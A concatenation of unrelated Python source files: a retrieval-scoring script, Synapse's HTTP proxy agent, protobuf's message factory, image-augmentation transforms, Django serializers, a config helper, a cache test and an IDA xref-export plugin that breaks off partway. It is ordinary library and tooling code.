ranked_spacy = read_ranked("../data/ranked/scapy-openbook.json",50)
ranked_sts = read_ranked("../data/ranked/sts-openbook.json",50)
ranked_trained = read_ranked("../data/ranked/sts-trained-openbook.json",50)
ranked_tfidf = read_ranked("../data/ranked/tfidf-openbook.json",50)
ranked_qnli = read_ranked("../data/ranked/qnli-openbook.json",50)
ranked_simple = read_ranked("../data/ranked/simplebert-openbook.json",50)
ranked_cnn = read_ranked("../data/ranked/cnn-openbook.json",50)
print("Scoring Unmerged")
# for ranked in [ranked_spacy,ranked_sts,ranked_trained,ranked_tfidf,ranked_qnli,ranked_simple,ranked_cnn]:
for ranked,name in zip([ranked_tfidf,ranked_sts,ranked_trained,ranked_cnn,ranked_simple],["tfidf","sts","trained","cnn","simple"]):
print("Model:",name)
print("Val")
score_ranked_fact1(ranked,[val],knowledgemap,knowledge,is_merged=False)
print("Test")
score_ranked_fact1(ranked,[test],knowledgemap,knowledge,is_merged=False)
|
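For readers unfamiliar with the ranked files consumed by read_ranked above, here is a hedged sketch of one JSON line; the question id and fact indices are invented, only the field names and the per-choice id suffix are taken from the script.
import json
example_line = '{"id": "8-343__ch_0", "ext_fact_global_ids": [[1021, 0.93], [57, 0.88], [4410, 0.61]]}'
record = json.loads(example_line)
top2 = record["ext_fact_global_ids"][0:2]   # list of [fact_index, score] pairs, best first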
py | 7dfae8b786b9db52675be4e5099a992e35ffa328 | # Copyright 2019 The Matrix.org Foundation C.I.C.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import base64
import logging
import re
from typing import Optional, Tuple
from urllib.request import getproxies_environment, proxy_bypass_environment
import attr
from zope.interface import implementer
from twisted.internet import defer
from twisted.internet.endpoints import HostnameEndpoint, wrapClientTLS
from twisted.python.failure import Failure
from twisted.web.client import URI, BrowserLikePolicyForHTTPS, _AgentBase
from twisted.web.error import SchemeNotSupported
from twisted.web.http_headers import Headers
from twisted.web.iweb import IAgent, IPolicyForHTTPS
from synapse.http.connectproxyclient import HTTPConnectProxyEndpoint
logger = logging.getLogger(__name__)
_VALID_URI = re.compile(br"\A[\x21-\x7e]+\Z")
@attr.s
class ProxyCredentials:
username_password = attr.ib(type=bytes)
def as_proxy_authorization_value(self) -> bytes:
"""
Return the value for a Proxy-Authorization header (i.e. 'Basic abdef==').
Returns:
            The encoded value for a Proxy-Authorization header, derived from
            the stored authentication string.
"""
# Encode as base64 and prepend the authorization type
return b"Basic " + base64.encodebytes(self.username_password)
@implementer(IAgent)
class ProxyAgent(_AgentBase):
"""An Agent implementation which will use an HTTP proxy if one was requested
Args:
reactor: twisted reactor to place outgoing
connections.
proxy_reactor: twisted reactor to use for connections to the proxy server
reactor might have some blacklisting applied (i.e. for DNS queries),
but we need unblocked access to the proxy.
contextFactory (IPolicyForHTTPS): A factory for TLS contexts, to control the
verification parameters of OpenSSL. The default is to use a
`BrowserLikePolicyForHTTPS`, so unless you have special
requirements you can leave this as-is.
connectTimeout (Optional[float]): The amount of time that this Agent will wait
for the peer to accept a connection, in seconds. If 'None',
HostnameEndpoint's default (30s) will be used.
This is used for connections to both proxies and destination servers.
bindAddress (bytes): The local address for client sockets to bind to.
pool (HTTPConnectionPool|None): connection pool to be used. If None, a
non-persistent pool instance will be created.
use_proxy (bool): Whether proxy settings should be discovered and used
from conventional environment variables.
"""
def __init__(
self,
reactor,
proxy_reactor=None,
contextFactory: Optional[IPolicyForHTTPS] = None,
connectTimeout=None,
bindAddress=None,
pool=None,
use_proxy=False,
):
contextFactory = contextFactory or BrowserLikePolicyForHTTPS()
_AgentBase.__init__(self, reactor, pool)
if proxy_reactor is None:
self.proxy_reactor = reactor
else:
self.proxy_reactor = proxy_reactor
self._endpoint_kwargs = {}
if connectTimeout is not None:
self._endpoint_kwargs["timeout"] = connectTimeout
if bindAddress is not None:
self._endpoint_kwargs["bindAddress"] = bindAddress
http_proxy = None
https_proxy = None
no_proxy = None
if use_proxy:
proxies = getproxies_environment()
http_proxy = proxies["http"].encode() if "http" in proxies else None
https_proxy = proxies["https"].encode() if "https" in proxies else None
no_proxy = proxies["no"] if "no" in proxies else None
# Parse credentials from https proxy connection string if present
self.https_proxy_creds, https_proxy = parse_username_password(https_proxy)
self.http_proxy_endpoint = _http_proxy_endpoint(
http_proxy, self.proxy_reactor, **self._endpoint_kwargs
)
self.https_proxy_endpoint = _http_proxy_endpoint(
https_proxy, self.proxy_reactor, **self._endpoint_kwargs
)
self.no_proxy = no_proxy
self._policy_for_https = contextFactory
self._reactor = reactor
def request(self, method, uri, headers=None, bodyProducer=None):
"""
Issue a request to the server indicated by the given uri.
Supports `http` and `https` schemes.
An existing connection from the connection pool may be used or a new one may be
created.
See also: twisted.web.iweb.IAgent.request
Args:
method (bytes): The request method to use, such as `GET`, `POST`, etc
uri (bytes): The location of the resource to request.
headers (Headers|None): Extra headers to send with the request
bodyProducer (IBodyProducer|None): An object which can generate bytes to
make up the body of this request (for example, the properly encoded
contents of a file for a file upload). Or, None if the request is to
have no body.
Returns:
Deferred[IResponse]: completes when the header of the response has
been received (regardless of the response status code).
Can fail with:
SchemeNotSupported: if the uri is not http or https
twisted.internet.error.TimeoutError if the server we are connecting
to (proxy or destination) does not accept a connection before
connectTimeout.
... other things too.
"""
uri = uri.strip()
if not _VALID_URI.match(uri):
raise ValueError("Invalid URI {!r}".format(uri))
parsed_uri = URI.fromBytes(uri)
pool_key = (parsed_uri.scheme, parsed_uri.host, parsed_uri.port)
request_path = parsed_uri.originForm
should_skip_proxy = False
if self.no_proxy is not None:
should_skip_proxy = proxy_bypass_environment(
parsed_uri.host.decode(),
proxies={"no": self.no_proxy},
)
if (
parsed_uri.scheme == b"http"
and self.http_proxy_endpoint
and not should_skip_proxy
):
# Cache *all* connections under the same key, since we are only
# connecting to a single destination, the proxy:
pool_key = ("http-proxy", self.http_proxy_endpoint)
endpoint = self.http_proxy_endpoint
request_path = uri
elif (
parsed_uri.scheme == b"https"
and self.https_proxy_endpoint
and not should_skip_proxy
):
connect_headers = Headers()
# Determine whether we need to set Proxy-Authorization headers
if self.https_proxy_creds:
# Set a Proxy-Authorization header
connect_headers.addRawHeader(
b"Proxy-Authorization",
self.https_proxy_creds.as_proxy_authorization_value(),
)
endpoint = HTTPConnectProxyEndpoint(
self.proxy_reactor,
self.https_proxy_endpoint,
parsed_uri.host,
parsed_uri.port,
headers=connect_headers,
)
else:
# not using a proxy
endpoint = HostnameEndpoint(
self._reactor, parsed_uri.host, parsed_uri.port, **self._endpoint_kwargs
)
logger.debug("Requesting %s via %s", uri, endpoint)
if parsed_uri.scheme == b"https":
tls_connection_creator = self._policy_for_https.creatorForNetloc(
parsed_uri.host, parsed_uri.port
)
endpoint = wrapClientTLS(tls_connection_creator, endpoint)
elif parsed_uri.scheme == b"http":
pass
else:
return defer.fail(
Failure(
SchemeNotSupported("Unsupported scheme: %r" % (parsed_uri.scheme,))
)
)
return self._requestWithEndpoint(
pool_key, endpoint, method, parsed_uri, headers, bodyProducer, request_path
)
def _http_proxy_endpoint(proxy: Optional[bytes], reactor, **kwargs):
"""Parses an http proxy setting and returns an endpoint for the proxy
Args:
proxy: the proxy setting in the form: [<username>:<password>@]<host>[:<port>]
Note that compared to other apps, this function currently lacks support
for specifying a protocol schema (i.e. protocol://...).
reactor: reactor to be used to connect to the proxy
kwargs: other args to be passed to HostnameEndpoint
Returns:
interfaces.IStreamClientEndpoint|None: endpoint to use to connect to the proxy,
or None
"""
if proxy is None:
return None
# Parse the connection string
host, port = parse_host_port(proxy, default_port=1080)
return HostnameEndpoint(reactor, host, port, **kwargs)
def parse_username_password(proxy: bytes) -> Tuple[Optional[ProxyCredentials], bytes]:
"""
    Parses the username and password from a proxy declaration, e.g.
username:password@hostname:port.
Args:
proxy: The proxy connection string.
Returns
An instance of ProxyCredentials and the proxy connection string with any credentials
stripped, i.e u:p@host:port -> host:port. If no credentials were found, the
ProxyCredentials instance is replaced with None.
"""
if proxy and b"@" in proxy:
# We use rsplit here as the password could contain an @ character
credentials, proxy_without_credentials = proxy.rsplit(b"@", 1)
return ProxyCredentials(credentials), proxy_without_credentials
return None, proxy
def parse_host_port(hostport: bytes, default_port: int = None) -> Tuple[bytes, int]:
"""
Parse the hostname and port from a proxy connection byte string.
Args:
hostport: The proxy connection string. Must be in the form 'host[:port]'.
default_port: The default port to return if one is not found in `hostport`.
Returns:
A tuple containing the hostname and port. Uses `default_port` if one was not found.
"""
if b":" in hostport:
host, port = hostport.rsplit(b":", 1)
try:
port = int(port)
return host, port
except ValueError:
# the thing after the : wasn't a valid port; presumably this is an
# IPv6 address.
pass
return hostport, default_port
|
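A brief sanity-check sketch for the two pure helpers defined at the end of the file above; the proxy host and credentials are made up.
creds, hostport = parse_username_password(b"user:s3cret@proxy.local:3128")
assert hostport == b"proxy.local:3128"
assert creds.as_proxy_authorization_value().startswith(b"Basic ")
host, port = parse_host_port(b"proxy.local:3128", default_port=1080)
assert (host, port) == (b"proxy.local", 3128)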
py | 7dfae907fe77937a3b058a123e75d492dce8d78e | import os
import sys
import subprocess
import shutil
COMMANDS_LIST = ('testmanage', 'test', 'release')
COMMANDS_INFO = {
'testmanage': 'run manage for test project',
'test': 'run tests (eq. "testmanage test")',
'release': 'make distributive and upload to pypi (setup.py bdist_wheel upload)'
}
def testmanage(*args):
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "tests.settings")
sys.path.append(os.path.dirname(os.path.abspath(__file__)))
sys.path.append(os.path.join(os.path.dirname(os.path.abspath(__file__)), 'tests'))
sys.path.append(os.path.join(os.path.dirname(os.path.abspath(__file__)), 'tests', 'apps'))
from django.core.management import execute_from_command_line
execute_from_command_line(['manage.py'] + list(args))
def test(*args):
testmanage('test', *args)
def release(*args):
root_dir = os.path.dirname(os.path.abspath(__file__))
shutil.rmtree(os.path.join(root_dir, 'build'), ignore_errors=True)
shutil.rmtree(os.path.join(root_dir, 'dist'), ignore_errors=True)
shutil.rmtree(os.path.join(root_dir, 'transtool.egg-info'), ignore_errors=True)
subprocess.call(['python', 'setup.py', 'sdist', 'bdist_wheel'])
subprocess.call(['twine', 'upload', 'dist/*'])
if __name__ == '__main__':
if len(sys.argv) > 1 and sys.argv[1] in COMMANDS_LIST:
locals()[sys.argv[1]](*sys.argv[2:])
else:
print('Available commands:')
for c in COMMANDS_LIST:
print(c + ' - ' + COMMANDS_INFO[c])
|
py | 7dfae9e1a011b902bf063ccdbb98c01e0c216b4f | cys = ["İstanbul", "Ankara", "İzmir", "Samsun"];i = 0
while i < len(cys):print(f"{i+1}-{cys[i]}");i+=1 |
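The same output can be produced with enumerate instead of a manual counter; a small equivalent sketch:
cities = ["İstanbul", "Ankara", "İzmir", "Samsun"]
for i, city in enumerate(cities, start=1):
    print(f"{i}-{city}")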
py | 7dfaec87424830ab4880fdb28bd5a9833f70f4e0 | import torchvision
import random
from PIL import Image, ImageOps
import numpy as np
import numbers
import math
import torch
class GroupRandomCrop(object):
def __init__(self, size):
if isinstance(size, numbers.Number):
self.size = (int(size), int(size))
else:
self.size = size
def __call__(self, img_group):
w, h = img_group[0].size
th, tw = self.size
out_images = list()
x1 = random.randint(0, w - tw)
y1 = random.randint(0, h - th)
for img in img_group:
assert(img.size[0] == w and img.size[1] == h)
if w == tw and h == th:
out_images.append(img)
else:
out_images.append(img.crop((x1, y1, x1 + tw, y1 + th)))
return out_images
class GroupCenterCrop(object):
def __init__(self, size):
self.worker = torchvision.transforms.CenterCrop(size)
def __call__(self, img_group):
return [self.worker(img) for img in img_group]
class GroupRandomHorizontalFlip(object):
"""Randomly horizontally flips the given PIL.Image with a probability of 0.5
"""
def __init__(self, is_flow=False):
self.is_flow = is_flow
def __call__(self, img_group, is_flow=False):
v = random.random()
if v < 0.5:
ret = [img.transpose(Image.FLIP_LEFT_RIGHT) for img in img_group]
if self.is_flow:
for i in range(0, len(ret), 2):
ret[i] = ImageOps.invert(ret[i]) # invert flow pixel values when flipping
return ret
else:
return img_group
class GroupNormalize(object):
def __init__(self, mean, std):
self.mean = mean
self.std = std
def __call__(self, tensor):
rep_mean = self.mean * (tensor.size()[0]//len(self.mean))
rep_std = self.std * (tensor.size()[0]//len(self.std))
# TODO: make efficient
for t, m, s in zip(tensor, rep_mean, rep_std):
t.sub_(m).div_(s)
return tensor
class GroupScale(object):
""" Rescales the input PIL.Image to the given 'size'.
'size' will be the size of the smaller edge.
For example, if height > width, then image will be
rescaled to (size * height / width, size)
size: size of the smaller edge
interpolation: Default: PIL.Image.BILINEAR
"""
def __init__(self, size, interpolation=Image.BILINEAR):
self.worker = torchvision.transforms.Scale(size, interpolation)
def __call__(self, img_group):
return [self.worker(img) for img in img_group]
class GroupOverSample(object):
def __init__(self, crop_size, scale_size=None):
self.crop_size = crop_size if not isinstance(crop_size, int) else (crop_size, crop_size)
if scale_size is not None:
self.scale_worker = GroupScale(scale_size)
else:
self.scale_worker = None
def __call__(self, img_group):
if self.scale_worker is not None:
img_group = self.scale_worker(img_group)
image_w, image_h = img_group[0].size
crop_w, crop_h = self.crop_size
offsets = GroupMultiScaleCrop.fill_fix_offset(False, image_w, image_h, crop_w, crop_h)
oversample_group = list()
for o_w, o_h in offsets:
normal_group = list()
flip_group = list()
for i, img in enumerate(img_group):
crop = img.crop((o_w, o_h, o_w + crop_w, o_h + crop_h))
normal_group.append(crop)
flip_crop = crop.copy().transpose(Image.FLIP_LEFT_RIGHT)
if img.mode == 'L' and i % 2 == 0:
flip_group.append(ImageOps.invert(flip_crop))
else:
flip_group.append(flip_crop)
oversample_group.extend(normal_group)
oversample_group.extend(flip_group)
return oversample_group
class GroupMultiScaleCrop(object):
def __init__(self, input_size, scales=None, max_distort=1, fix_crop=True, more_fix_crop=True):
        self.scales = scales if scales is not None else [1, .875, .75, .66]  # fractions of the base size (.875, not 875)
self.max_distort = max_distort
self.fix_crop = fix_crop
self.more_fix_crop = more_fix_crop
self.input_size = input_size if not isinstance(input_size, int) else [input_size, input_size]
self.interpolation = Image.BILINEAR
def __call__(self, img_group):
im_size = img_group[0].size
crop_w, crop_h, offset_w, offset_h = self._sample_crop_size(im_size)
crop_img_group = [img.crop((offset_w, offset_h, offset_w + crop_w, offset_h + crop_h)) for img in img_group]
ret_img_group = [img.resize((self.input_size[0], self.input_size[1]), self.interpolation)
for img in crop_img_group]
return ret_img_group
def _sample_crop_size(self, im_size):
image_w, image_h = im_size[0], im_size[1]
# find a crop size
base_size = min(image_w, image_h)
crop_sizes = [int(base_size * x) for x in self.scales]
crop_h = [self.input_size[1] if abs(x - self.input_size[1]) < 3 else x for x in crop_sizes]
crop_w = [self.input_size[0] if abs(x - self.input_size[0]) < 3 else x for x in crop_sizes]
pairs = []
for i, h in enumerate(crop_h):
for j, w in enumerate(crop_w):
if abs(i - j) <= self.max_distort:
pairs.append((w, h))
crop_pair = random.choice(pairs)
if not self.fix_crop:
w_offset = random.randint(0, image_w - crop_pair[0])
h_offset = random.randint(0, image_h - crop_pair[1])
else:
w_offset, h_offset = self._sample_fix_offset(image_w, image_h, crop_pair[0], crop_pair[1])
return crop_pair[0], crop_pair[1], w_offset, h_offset
def _sample_fix_offset(self, image_w, image_h, crop_w, crop_h):
offsets = self.fill_fix_offset(self.more_fix_crop, image_w, image_h, crop_w, crop_h)
return random.choice(offsets)
@staticmethod
def fill_fix_offset(more_fix_crop, image_w, image_h, crop_w, crop_h):
w_step = (image_w - crop_w) // 4
h_step = (image_h - crop_h) // 4
ret = list()
ret.append((0, 0)) # upper left
ret.append((4 * w_step, 0)) # upper right
ret.append((0, 4 * h_step)) # lower left
ret.append((4 * w_step, 4 * h_step)) # lower right
ret.append((2 * w_step, 2 * h_step)) # center
if more_fix_crop:
ret.append((0, 2 * h_step)) # center left
ret.append((4 * w_step, 2 * h_step)) # center right
ret.append((2 * w_step, 4 * h_step)) # lower center
ret.append((2 * w_step, 0 * h_step)) # upper center
ret.append((1 * w_step, 1 * h_step)) # upper left quarter
ret.append((3 * w_step, 1 * h_step)) # upper right quarter
ret.append((1 * w_step, 3 * h_step)) # lower left quarter
            ret.append((3 * w_step, 3 * h_step)) # lower right quarter
return ret
class GroupRandomSizedCrop(object):
"""Random crop the given PIL.Image to a random size of (0.08 to 1.0) of the original size
    and a random aspect ratio of 3/4 to 4/3 of the original aspect ratio
This is popularly used to train the Inception networks
size: size of the smaller edge
interpolation: Default: PIL.Image.BILINEAR
"""
def __init__(self, size, interpolation=Image.BILINEAR):
self.size = size
self.interpolation = interpolation
def __call__(self, img_group):
for attempt in range(10):
area = img_group[0].size[0] * img_group[0].size[1]
target_area = random.uniform(0.08, 1.0) * area
aspect_ratio = random.uniform(3. / 4, 4. / 3)
w = int(round(math.sqrt(target_area * aspect_ratio)))
h = int(round(math.sqrt(target_area / aspect_ratio)))
if random.random() < 0.5:
w, h = h, w
if w <= img_group[0].size[0] and h <= img_group[0].size[1]:
x1 = random.randint(0, img_group[0].size[0] - w)
y1 = random.randint(0, img_group[0].size[1] - h)
found = True
break
else:
found = False
x1 = 0
y1 = 0
if found:
out_group = list()
for img in img_group:
img = img.crop((x1, y1, x1 + w, y1 + h))
assert(img.size == (w, h))
out_group.append(img.resize((self.size, self.size), self.interpolation))
return out_group
else:
# Fallback
scale = GroupScale(self.size, interpolation=self.interpolation)
crop = GroupRandomCrop(self.size)
return crop(scale(img_group))
class Stack(object):
def __init__(self, roll=False):
self.roll = roll
def __call__(self, img_group):
if img_group[0].mode == 'L':
return np.concatenate([np.expand_dims(x, 2) for x in img_group], axis=2)
elif img_group[0].mode == 'RGB':
if self.roll:
return np.concatenate([np.array(x)[:, :, ::-1] for x in img_group], axis=2)
else:
return np.concatenate(img_group, axis=2)
class ToTorchFormatTensor(object):
""" Converts a PIL.Image (RGB) or numpy.ndarray (H x W x C) in the range [0, 255]
to a torch.FloatTensor of shape (C x H x W) in the range [0.0, 1.0] """
def __init__(self, div=True):
self.div = div
def __call__(self, pic):
if isinstance(pic, np.ndarray):
# handle numpy array
img = torch.from_numpy(pic).permute(2, 0, 1).contiguous()
else:
# handle PIL Image
img = torch.ByteTensor(torch.ByteStorage.from_buffer(pic.tobytes()))
img = img.view(pic.size[1], pic.size[0], len(pic.mode))
# put it from HWC to CHW format
# yikes, this transpose takes 80% of the loading time/CPU
img = img.transpose(0, 1).transpose(0, 2).contiguous()
return img.float().div(255) if self.div else img.float()
class IdentityTransform(object):
def __call__(self, data):
return data
if __name__ == "__main__":
trans = torchvision.transforms.Compose([
GroupScale(256),
GroupRandomCrop(224),
Stack(),
ToTorchFormatTensor(),
GroupNormalize(
mean=[.485, .456, .406],
std=[.229, .224, .225]
)]
)
im = Image.open('../tensorflow-model-zoo.torch/lena_299.png')
color_group = [im] * 3
rst = trans(color_group)
gray_group = [im.convert('L')] * 9
gray_rst = trans(gray_group)
trans2 = torchvision.transforms.Compose([
GroupRandomSizedCrop(256),
Stack(),
ToTorchFormatTensor(),
GroupNormalize(
mean=[.485, .456, .406],
std=[.229, .224, .225])
])
print(trans2(color_group)) |
py | 7dfaec88e15e176adb7363c288c53d189b37a294 | # Protocol Buffers - Google's data interchange format
# Copyright 2008 Google Inc. All rights reserved.
# https://developers.google.com/protocol-buffers/
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""Provides a factory class for generating dynamic messages.
The easiest way to use this class is if you have access to the FileDescriptor
protos containing the messages you want to create, you can just do the following:
message_classes = message_factory.GetMessages(iterable_of_file_descriptors)
my_proto_instance = message_classes['some.proto.package.MessageName']()
"""
__author__ = '[email protected] (Matt Toia)'
from google.protobuf.internal import api_implementation
from google.protobuf import descriptor_pool
from google.protobuf import message
if api_implementation.Type() == 'cpp':
from google.protobuf.pyext import cpp_message as message_impl
else:
from google.protobuf.internal import python_message as message_impl
# The type of all Message classes.
_GENERATED_PROTOCOL_MESSAGE_TYPE = message_impl.GeneratedProtocolMessageType
class MessageFactory(object):
"""Factory for creating Proto2 messages from descriptors in a pool."""
def __init__(self, pool=None):
"""Initializes a new factory."""
self.pool = pool or descriptor_pool.DescriptorPool()
# local cache of all classes built from protobuf descriptors
self._classes = {}
def GetPrototype(self, descriptor):
"""Obtains a proto2 message class based on the passed in descriptor.
Passing a descriptor with a fully qualified name matching a previous
invocation will cause the same class to be returned.
Args:
descriptor: The descriptor to build from.
Returns:
A class describing the passed in descriptor.
"""
if descriptor not in self._classes:
result_class = self.CreatePrototype(descriptor)
# The assignment to _classes is redundant for the base implementation, but
# might avoid confusion in cases where CreatePrototype gets overridden and
# does not call the base implementation.
self._classes[descriptor] = result_class
return result_class
return self._classes[descriptor]
def CreatePrototype(self, descriptor):
"""Builds a proto2 message class based on the passed in descriptor.
Don't call this function directly, it always creates a new class. Call
    GetPrototype() instead. This method is meant to be overridden in subclasses
to perform additional operations on the newly constructed class.
Args:
descriptor: The descriptor to build from.
Returns:
A class describing the passed in descriptor.
"""
descriptor_name = descriptor.name
if str is bytes: # PY2
descriptor_name = descriptor.name.encode('ascii', 'ignore')
result_class = _GENERATED_PROTOCOL_MESSAGE_TYPE(
descriptor_name,
(message.Message,),
{
'DESCRIPTOR': descriptor,
# If module not set, it wrongly points to message_factory module.
'__module__': None,
})
result_class._FACTORY = self # pylint: disable=protected-access
# Assign in _classes before doing recursive calls to avoid infinite
# recursion.
self._classes[descriptor] = result_class
for field in descriptor.fields:
if field.message_type:
self.GetPrototype(field.message_type)
for extension in result_class.DESCRIPTOR.extensions:
if extension.containing_type not in self._classes:
self.GetPrototype(extension.containing_type)
extended_class = self._classes[extension.containing_type]
extended_class.RegisterExtension(extension)
return result_class
def GetMessages(self, files):
"""Gets all the messages from a specified file.
This will find and resolve dependencies, failing if the descriptor
pool cannot satisfy them.
Args:
files: The file names to extract messages from.
Returns:
A dictionary mapping proto names to the message classes. This will include
any dependent messages as well as any messages defined in the same file as
a specified message.
"""
result = {}
for file_name in files:
file_desc = self.pool.FindFileByName(file_name)
for desc in file_desc.message_types_by_name.values():
result[desc.full_name] = self.GetPrototype(desc)
# While the extension FieldDescriptors are created by the descriptor pool,
# the python classes created in the factory need them to be registered
# explicitly, which is done below.
#
# The call to RegisterExtension will specifically check if the
# extension was already registered on the object and either
# ignore the registration if the original was the same, or raise
# an error if they were different.
for extension in file_desc.extensions_by_name.values():
if extension.containing_type not in self._classes:
self.GetPrototype(extension.containing_type)
extended_class = self._classes[extension.containing_type]
extended_class.RegisterExtension(extension)
return result
_FACTORY = MessageFactory()
def GetMessages(file_protos):
"""Builds a dictionary of all the messages available in a set of files.
Args:
file_protos: Iterable of FileDescriptorProto to build messages out of.
Returns:
A dictionary mapping proto names to the message classes. This will include
any dependent messages as well as any messages defined in the same file as
a specified message.
"""
# The cpp implementation of the protocol buffer library requires to add the
# message in topological order of the dependency graph.
file_by_name = {file_proto.name: file_proto for file_proto in file_protos}
def _AddFile(file_proto):
for dependency in file_proto.dependency:
if dependency in file_by_name:
# Remove from elements to be visited, in order to cut cycles.
_AddFile(file_by_name.pop(dependency))
_FACTORY.pool.Add(file_proto)
while file_by_name:
_AddFile(file_by_name.popitem()[1])
return _FACTORY.GetMessages([file_proto.name for file_proto in file_protos])
|
py | 7dfaed44525cab981e4cdadbec8abe69ede2c22c | from configparser import ConfigParser
import configparser
import init_config
class Config:
def __init__(self):
self.parser = ConfigParser()
try:
self.parser.read('config.ini')
except configparser.NoSectionError:
            # Presumably relies on the import of init_config above to build a
            # default config at import time; the bare name on its own is a no-op.
            init_config
def get_startup(self):
return self.parser.getboolean('basic', 'startup')
def get_productive(self):
return self.parser.getint('basic', 'productive')
def get_location(self):
return self.parser.get('files', 'location')
def set_startup(self, boolean):
if(boolean):
self.parser.set('basic', 'startup', 'true')
else:
self.parser.set('basic', 'startup', 'false')
self.save_config()
def set_productive(self, percentage):
self.parser.set('basic', 'productive', str(percentage))
self.save_config()
def set_location(self, location):
self.parser.set('files', 'location', location)
self.save_config()
def save_config(self):
with open('./config.ini', 'w') as c:
self.parser.write(c)
if __name__ == '__main__':
print(Config().get_startup()) |
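A hedged sketch of the config.ini layout the Config class above assumes; the section and option names come from its getters, the values are examples only.
from configparser import ConfigParser
example_ini = """
[basic]
startup = true
productive = 75
[files]
location = ./data
"""
parser = ConfigParser()
parser.read_string(example_ini)
assert parser.getboolean("basic", "startup") is True
assert parser.getint("basic", "productive") == 75
assert parser.get("files", "location") == "./data"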
py | 7dfaed914785c19fc716c5ce42b4c803dd2a1fcf | #!/usr/bin/env python3
# See LICENSE for licensing information.
#
# Copyright (c) 2021 Regents of the University of California and The Board
# of Regents for the Oklahoma Agricultural and Mechanical College
# (acting for and on behalf of Oklahoma State University)
# All rights reserved.
#
import sys, os
import unittest
sys.path.append(os.getenv("OPENCACHE_HOME"))
from testutils import *
import globals
from base.policy import replacement_policy as rp
from globals import OPTS
class verify_test(opencache_test):
def runTest(self):
OPENCACHE_HOME = os.getenv("OPENCACHE_HOME")
config_file = "{}/tests/configs/config.py".format(OPENCACHE_HOME)
globals.init_opencache(config_file)
OPTS.num_ways = 4
OPTS.replacement_policy = rp.LRU
OPTS.simulate = True
OPTS.synthesize = True
conf = make_config()
from cache import cache
c = cache(cache_config=conf,
name=OPTS.output_name)
c.save()
self.check_verification(conf, OPTS.output_name)
globals.end_opencache()
# Run the test from the terminal
if __name__ == "__main__":
(OPTS, args) = globals.parse_args()
del sys.argv[1:]
header(__file__)
unittest.main() |
py | 7dfaee1aa0af02c8c14cbf79ccd63c4a4f57182c | from django.contrib.auth import get_user_model, authenticate
from django.utils.translation import gettext_lazy as _
from rest_framework import serializers
class UserSerializer(serializers.ModelSerializer):
"""Serializer for the user object"""
class Meta:
model = get_user_model()
fields = ('name', 'email', 'password', 'problems')
extra_kwargs = {'password': {'write_only': True, 'min_length': 8}}
def create(self, validated_data):
"""Create a new user with encrypted password and return it"""
return get_user_model().objects.create_user(**validated_data)
def update(self, instance, validated_data):
"""Update a user, setting the password correctly and return it"""
password = validated_data.pop('password', None)
user = super().update(instance, validated_data)
if password:
user.set_password(password)
user.save()
return user
class AuthTokenSerializer(serializers.Serializer):
"""Serializer for the user authentication object"""
email = serializers.CharField()
password = serializers.CharField(
style={'input_type': 'password'},
trim_whitespace=False
)
def validate(self, attrs):
"""Validate and authenticate the user"""
email = attrs.get('email')
password = attrs.get('password')
user = authenticate(
request=self.context.get('request'),
username=email,
password=password
)
if not user:
msg = _('Unable to authenticate with provided credentials')
raise serializers.ValidationError(msg, code='authentication')
attrs['user'] = user
return attrs
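# Hedged usage sketch (illustrative only): how a view or shell session would
# typically drive the serializers above.  The exact payload keys depend on the
# project's custom user model, so the expected dict shape is an assumption.
def _example_create_user(payload):
    """Create a user from a dict like {'name': ..., 'email': ..., 'password': ...}."""
    serializer = UserSerializer(data=payload)
    serializer.is_valid(raise_exception=True)
    return serializer.save()  # delegates to create() -> create_user()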
|
py | 7dfaee5e9ad844e647c4921f76b1bb21ced8f038 | from __future__ import print_function
import os
import json
import ida_bytes
import ida_enum
import ida_kernwin
import ida_nalt
import ida_name
import ida_offset
import ida_struct
import ida_typeinf
import ida_ua
import idautils
import idc
import ida_idaapi
from ida_idaapi import BADADDR
class export_handler_t(ida_kernwin.action_handler_t):
def activate(self, ctx):
addr = ida_kernwin.askaddr(0, "Target address")
if addr == BADADDR:
print('[Export-Xref] Bad address given')
return 1
filename = ida_kernwin.ask_file(True, '*', 'Export Xrefs to...')
if filename is None:
return 1
print('[Export-Xref] Exporting %s...' % filename)
with open(filename, 'w') as f:
            for x in idautils.XrefsTo(addr, 0):
print("0x%08x," % x.frm, file=f)
print('[Export-Xref] Done')
return 1
def update(self, ctx):
return ida_kernwin.AST_ENABLE_ALWAYS
class export_xref_t(ida_idaapi.plugin_t):
flags = 0
comment = "Export Xref into a C-friendly format"
help = "Export Xref"
wanted_name = "Export-Xref"
wanted_hotkey = ''
def init(self):
export_action = ida_kernwin.action_desc_t(
'export-xref:export',
'Export Xref...',
export_handler_t())
ida_kernwin.register_action(export_action)
ida_kernwin.attach_action_to_menu(
'File/Produce file/',
'export-xref:export',
